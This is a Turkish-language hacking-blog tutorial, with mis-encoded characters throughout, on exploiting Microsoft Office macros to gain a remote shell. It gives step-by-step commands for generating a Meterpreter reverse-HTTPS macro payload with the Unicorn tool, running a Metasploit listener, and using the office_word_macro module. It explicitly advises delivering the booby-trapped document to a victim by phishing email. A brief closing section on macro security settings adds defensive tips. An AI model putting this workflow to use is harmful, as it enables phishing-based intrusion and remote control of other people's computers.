S─▒zma Testi

­čŤíMicrosoft Office Macro zafiyetini S├Âm├╝rmeÔÜö´ŞĆ

Reklam

­čĺúMicrosoft Office Macro zafiyetini S├Âm├╝rme ­čŤá

Herkese merhabalar arkada┼člar bug├╝n ki konum ba┼čl─▒ktan da ├žok net anla┼č─▒laca─č─▒ ├╝zerine Microsoft Office 2010 ├╝zerinde test edece─čimiz hatta daha ├╝st versiyonlar─▒nda da test etti─čim. Microsoft Office Programlar─▒ndaki macro ├Âzelli─čini kullanarak Sisteme S─▒zma i┼čleminden bahsedece─čim. Bunu g├Âsterme amac─▒m kurumlar─▒ ve ki┼čileri bir nebze de olsa bilin├žlendirmek. Siber Alanda ├žok ciddi zararlar─▒n verilmesini ├Ânlemektir. E─čitim amac─▒ ile kullan─▒lmas─▒n─▒ ama├žland─▒─č─▒ i├žin, edindi─činiz bilgileri kullanman─▒z, yorumlaman─▒z ve neticesinde u─črayabilece─činiz/u─čratabilece─činiz ├╝├ž├╝nc├╝ ki┼čilere verece─činiz olas─▒ zararlardan hi├žbir ┼čekilde ve surette hukuki ve cezai sorumlulu─ču kendi ad─▒ma ve T├╝rk Hack Team Ad─▒na kabul edilemez.

VBA (Makro) NED─░R?

Visual Basic for Applications yani K─▒saltmas─▒ olarak VBA┬á , S─▒k olarak Microsoft Office Programlar─▒nda kullan─▒lan bir programlama dili olma ├Âzelli─či vard─▒r.

Peki VBA Amacı nedir? 

Uygulamalar aras─▒ndaki optimizasyonu sa─člamak, Kullan─▒c─▒lar─▒n ─░┼člerini kolayla┼čt─▒rmak ve ├Âzg├╝rle┼čtirmek i├žin tasarlanm─▒┼čt─▒r. K─▒saca ┼č├Âyle bahsetmekte yarar var i┼činin amac─▒na uygun olarak otomatik hale getirip gerekli uygulamalar ile entegre olmas─▒n─▒ sa─člayan bir ara├ž niteli─či ta┼č─▒r.

MACRO’nun Bulundu─ču S├╝r├╝mler nelerdir?┬á

Microsoft Office 2007

Microsoft Office 2010

Microsoft Office 2013

ve Daha yeni sürümlerde  bulunmaktadır.

Gerekli Uygulamalar

Macro ├Âzelli─čine sahip Microsoft Office program─▒

Python ile Dave Kennedy taraf─▒ndan Kodlanm─▒┼č Unicorn Arac─▒

Unicorn Arac─▒

Hakk─▒nda Bilgi

Matthew Graeber’s in defcon 18 de sundu─ču powershell sald─▒r─▒s─▒ ile antivir├╝s programlar─▒n─▒ bypass tekni─čini kullanarak geli┼čtirilen zararl─▒ bir shellkod’u macro yard─▒m─▒ ile enjekte etmesi i├žin tasarlanm─▒┼č bir ara├žt─▒r. Metasploit kullanarak zararl─▒ yaz─▒l─▒mla ba─člant─▒ kurmam─▒z─▒ sa─člar.

Kurulumu

Kali Linux ─░┼čletim sistemi Kullan─▒larak S─▒ras─▒yla

git clone https://github.com/trustedsec/unicorn.git

cd unicorn

chmod +x unicorn.py

./unicorn.py

Yapman─▒z Yeterlidir.

Kurulum Tamamland─▒.

S─▒zma i┼člemi

Gerekli b├╝t├╝n Zemini Haz─▒rlad─▒─č─▒m─▒za g├Âre art─▒k Arac─▒m─▒z─▒ kullan─▒p Macro ├Âzelli─čini s├Âm├╝re biliriz.

E─čer Ara├ž Hakk─▒nda Daha fazla Yard─▒m Almak istiyorsan─▒z.

./unicorn.py --help

Komutunu kullanman─▒z yeterli tabii k─▒rm─▒z─▒ ile belirtti─čim gibi biz arac─▒n macro ├Âzelli─čini kullanaca─č─▒z.

1.A┼×AMA

─░lk ├Ânce Makinemizin Ip adresini ├Â─čreniyoruz. Ki bu makinemiz ile ba─člant─▒ sa─člayabilelim.

2.A┼×AMA

python unicorn.py windows/meterpreter/reverse_https IP Adress port macro

En son Sat─▒rda Nereye kaydetti─či hakk─▒nda bilgi ve dinlemeye almam─▒z i├žin bir gerekli dok├╝man sa─čl─▒yor.

3.A┼×AMA

D├Âk├╝man─▒ Okumam─▒z i├žin;

mousepad powershell_attack.txt

veya

leafpad powershell_attack.txt

ile a├žabiliriz.

4.A┼×AMA

txt dosyas─▒ndaki kodlamalar─▒n hepsini kopyal─▒yoruz.

Dinlemeye al─▒yoruz.

msfconsole -r unicorn.rc

5.A┼×AMA

Ve windows 10 i┼čletim sistemin a├ž─▒p gereken i┼člemler s─▒ras─▒yla

Microsoft Office Excel program─▒n─▒ A├ž─▒yoruz yada macro ├Âzelli─či olan herhangi bir program─▒n─▒

G├Âr├╝n├╝m>Makrolar>Makrolar─▒ G├Âr├╝nt├╝le

6.A┼×AMA

Olu┼čturaca─čim─▒z Makro ismini yaz─▒p>Olu┼čtur diyoruz.

7.A┼×AMA

Kopyalad─▒─č─▒m─▒z powershell_attack.txt kodlar─▒n─▒ Module1 alan─▒na yap─▒┼čt─▒r─▒p kaydediyoruz.

8.A┼×AMA

Yapmam─▒z Gereken Kurbana ister phissing ile kurumsal olarak e-posta y├Ântemi ile isterseniz ki┼čisel olarak belirli hedefe g├Ânderip ba─člant─▒ almaya geldi.

Yard─▒mc─▒ olmas─▒ i├žin detayl─▒ bilgi almak isterseniz. (Buraya T─▒klay─▒p) Di─čer Makaleme g├Âz atabilirsiniz.

Bazen Olu┼čturdu─čumuz bu d├Âk├╝manda onay vermemizi isteyebilir, Bazen ise istemeyebilir bu makro ayarlar─▒ ile ilgilidir.

9.A┼×AMA

Kurban Olu┼čturdu─čumuz Zararl─▒ Kodlu Macro D├Âk├╝man─▒m─▒z─▒ A├žt─▒ktan Sonra

Gerekli g├Âr├╝ld├╝─č├╝nde Onay verdikten sonra Kali Linux ─░┼čletim sistemize

Kurban─▒n Bilgisayar─▒ ile Ba─člant─▒ Kuruyoruz.

Yani Kurban─▒n i┼čletim sistemine S─▒zma i┼člemi Tamamland─▒.

Diyelim ki siz Unicorn Arac─▒n─▒ kullanmak hatta macro olu┼čturarak Zaman kaybetmek istemezseniz.

METASPLO─░T

Metasploit Program─▒n─▒n i├žinde Zaten Yaz─▒lm─▒┼č bir exploit Bulunmakta gelin g├Ârelim.

Name: Microsoft Office Word Malicious Macro Execution
Module: exploit/multi/fileformat/office_word_macro
Rank: Excellent
Disclosed: 2012-01-10
A├ž─▒klama: Bu mod├╝l, Microsoft Office Word belgesine (docx) k├Ât├╝ ama├žl─▒ bir makro enjekte eder.
Meta verilerdeki yorumlar alan─▒na, makro taraf─▒ndan kodu ├ž├Âz├╝lecek ve bir Windows y├╝r├╝t├╝lebilir dosyas─▒ olarak y├╝r├╝t├╝lecek olan Base64 kodlu bir y├╝k y├╝klenir.
Ba┼čar─▒l─▒ bir sald─▒r─▒ i├žin ma─čdurun makro y├╝r├╝tmeyi manuel olarak etkinle┼čtirmesi gerekir.

1.A┼×AMA

search Microsoft Office macro yazarak arat─▒yoruz.

2.A┼×AMA

use exploit/multi/fileformat/office_word_macro

set Filename PourLa.docx

set Payload windows/meterpreter/reverse_tcp

set Lhost Kendi Ip adressimiz

set Lport Ba─člant─▒ kuraca─č─▒m─▒z port

set target 0 (Windows i├žin) mac i├žin(1 se├žin)

run

Gerekli b├╝t├╝n ayarlar─▒ yapt─▒ktan sonra exploit yada run diyerek exploitimizi ├žal─▒┼čt─▒r─▒yoruz.

Geri Kalan b├╝t├╝n i┼člemler ayn─▒d─▒r. Dinlemeye al─▒p olu┼čuturdu─čumuz d├Âk├╝man─▒ kurban─▒n ├žal─▒┼čt─▒rmas─▒n─▒ beklemek.

Peki Biz Bu Macro zafiyetini nas─▒l ├Ânl├╝yebiliriz?

G├╝venilir olmayan d├Âk├╝manlar─▒ indirmemek gerekir. Kurumsal e-postan─▒za g├╝nden y├╝z binlerce phising y├Ântemi ile kullan─▒lan mailler bulunmakta sadece i├žinden g├╝vendi─činiz ki┼čilerin att─▒─č─▒ e-postalar─▒ a├žman─▒zda fayda var. Diyelim ki indirdiniz bir dok├╝man baz─▒ sitelerden forumlardan vs. Siz d├Âk├╝man─▒ a├žar a├žmaz Sizden etkinle┼čtirme istiyorsa bir kez daha d├╝┼č├╝n├╝n derim. Ayn─▒ zaman da Microsoft Office Programlar─▒n─▒z─▒ ┼ču ayarlar─▒n─▒z─▒ G├╝venli─činiz A├ž─▒s─▒ndan ger├žekle┼čtiriniz.

1.A┼×AMA

Dosya>Se├ženekler>G├╝ven Merkezi>G├╝ven Merkezi Ayarlar─▒ b├Â├╝m├╝nden

2.A┼×AMA

Makro Ayarlar─▒ b├Âl├╝m├╝ne gelip gerekli Kutucular─▒ g├Âr├╝ld├╝─č├╝ gibi i┼čaretleyiniz.

SONUÇ

Yapt─▒klar─▒m─▒zdan k─▒saca bahsetmek gerekirse, Gerekli oldu─čunu g├Ârd├╝─č├╝m bilgileri Verdikten sonra Zaafiyet’i S├Âm├╝rmeyi g├Âsterdim. B├Âylece Kurban─▒n Bilgisayar─▒na s─▒zm─▒┼č olduk. Ayn─▒ zaman da Bu zaafiyet i├žin gerekli ├Ânlemlerin al─▒nmas─▒ i├žin a┼čamalardan bahsettim.

 

Etiketler
Daha Fazla G├Âster

Eren ├ľzt├╝rk

Say─▒sal d├╝┼č├╝nme yetene─či y├╝ksek, say─▒larla u─čra┼čmaktan s─▒k─▒lmayan, sosyal olaylara ilgili, Bir konuyu ayr─▒nt─▒lar─▒na inerek, nedenlerini bulmaya y├Ânelik ├žal─▒┼čmalardan ho┼članan, de─či┼čik g├Âr├╝┼člere ve yeniliklere a├ž─▒k, Bir i┼či planlayabilme ve uygulamaya koyabilme, uzak g├Âr├╝┼čl├╝ olma gibi ├Âzelliklere sahip oldu─čumu d├╝┼č├╝n├╝yorum.

Bir cevap yaz─▒n

E-posta hesab─▒n─▒z yay─▒mlanmayacak. Gerekli alanlar * ile i┼čaretlenmi┼člerdir